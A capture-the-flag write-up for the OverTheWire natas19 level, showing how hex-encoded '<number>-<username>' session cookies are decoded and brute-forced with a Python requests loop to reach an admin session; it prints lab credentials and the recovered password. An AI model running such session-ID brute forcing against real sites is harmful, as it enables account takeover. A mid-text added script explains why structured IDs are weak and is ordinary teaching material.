After logging in we are greeted with the following message: This page uses mostly the same code as the previous level, but session IDs are no longer sequential…
So let's check what the PHPSESSID value is now. You can do this by inspecting the cookies in your browser: press F12 and go to the Storage tab. After logging in, the value of PHPSESSID is 3235302d61. If we change this value and refresh the page, the same value returns.
Let's try some other things. Let's log in multiple times with the form left empty:
1st attempt 3431322d
2nd attempt 3234352d
3rd attempt 3138322d
4th attempt 3237302d
The value always ends with 2d. Let's try filling in something else, for example A.
1st attempt 3239312d41
2nd attempt 38322d41
3rd attempt 3330372d41
4th attempt 3430362d41
Again, the same ending value always follows what you enter. After some research, this looks like a hexadecimal number. The decoded value is always xxx-A, where xxx is a number of 1 to 3 digits, followed by -A.
3239312d41 = 291-A
38322d41 = 82-A
3330372d41 = 307-A
3430362d41 = 406-A
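To make the pattern concrete, here is a small added Python script (my own example, not code from this write-up or from OverTheWire) that decodes the cookie values listed above, re-encodes a guess the same way, and contrasts the tiny effective search space with a session ID drawn from a CSPRNG, which is what a proper session handler issues. The list of observed IDs is copied from the values above; the function names and the 640 upper bound used for the entropy estimate are assumptions for illustration.

```python
import math
import secrets

# Session IDs observed in the write-up above (copied from the page, constructed list).
OBSERVED = ["3239312d41", "38322d41", "3330372d41", "3430362d41", "3235302d61"]


def decode_session_id(hex_id: str) -> tuple:
    """Decode a hex-encoded PHPSESSID of the form "<number>-<username>".

    Raises ValueError if the value does not follow that structure.
    """
    raw = bytes.fromhex(hex_id).decode("utf-8")
    number, sep, user = raw.partition("-")
    if sep != "-" or not number.isdigit():
        raise ValueError(f"not a <number>-<username> session id: {raw!r}")
    return int(number), user


def encode_session_id(number: int, user: str) -> str:
    """Rebuild a session ID the same way the page's cookies appear to be built."""
    return f"{number}-{user}".encode("utf-8").hex()


def search_space_bits(max_number: int) -> float:
    """Effective entropy once the username part is known: log2 of the numeric range."""
    return math.log2(max_number)


def random_session_id(nbytes: int = 16) -> str:
    """What a session ID should look like: CSPRNG bytes, hex-encoded (128 bits here)."""
    return secrets.token_hex(nbytes)


def looks_structured(hex_id: str) -> bool:
    """True when an ID decodes to <number>-<username>, i.e. it is derived, not random."""
    try:
        decode_session_id(hex_id)
        return True
    except (ValueError, UnicodeDecodeError):
        return False


if __name__ == "__main__":
    for sid in OBSERVED:
        number, user = decode_session_id(sid)
        print(f"{sid:>12} -> {number}-{user}")
    print(f"round trip: {encode_session_id(291, 'A')}")
    # Assumed bound of 640 taken from the previous level's range mentioned in the write-up.
    print(f"effective entropy with a known username: {search_space_bits(640):.1f} bits")
    rnd = random_session_id()
    print(f"CSPRNG id: {rnd} ({len(rnd) * 4} bits), structured? {looks_structured(rnd)}")
```

The point of the contrast is the last two lines of output: the derived ID leaves roughly nine bits of uncertainty once the username is known, while a 16-byte random ID leaves 128 bits and does not decode into anything meaningful. A session ID that survives `looks_structured` is a defect to fix, not a property to rely on.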
Would the number still go from 1 to 640? Let's try to change our code to generate the hex encodings of 1-640 with -admin appended to each. After some searching, trying and retrying I wrote a loop that prints the string and the hex value of the string. I came up with the following loop:
    for i in range(1, 641):
        # plain string first, then its hex encoding
        print(str(i) + '-admin')
        hexencode = (str(i) + '-admin').encode("utf-8").hex()
        print(hexencode)
I have to write and google these parts of the code since I'm not too familiar with Python and still learning. A nice challenge if you ask me. Now that we have a way to make the strings we want and convert them to hex, we can edit our old code so we can brute-force the PHPSESSID cookies. The code is:
    import requests

    url = "http://natas19.natas.labs.overthewire.org/"
    auth_username = "natas19"
    auth_password = "4IwIrekcuZlA9OsjOkoUtwU6lhokCPYs"
    user_str = "You are logged in as a regular user."
    for i in range(1, 641):
        # candidate session ID: "<number>-admin", hex-encoded like the observed cookies
        cookies = dict(PHPSESSID=(str(i) + '-admin').encode("utf-8").hex())
        r = requests.get(url, auth=(auth_username, auth_password), cookies=cookies)
        if user_str in r.text:
            print("Attempt ", i, " is not admin!")
        else:
            print("Attempt ", i, " IS ADMIN!")
            # the page contents contain the password for the next level
            print(r.text)
After running it for a minute we got it: attempt 281 is admin! I didn't print the cookie, but it outputs the contents of the webpage so we can see the password. If you would like to see the hex value of the cookie, you could print the cookie value in the else statement. The password is: eofm3Wsshxc5bwtVnEuGIlr7ivb9KABF.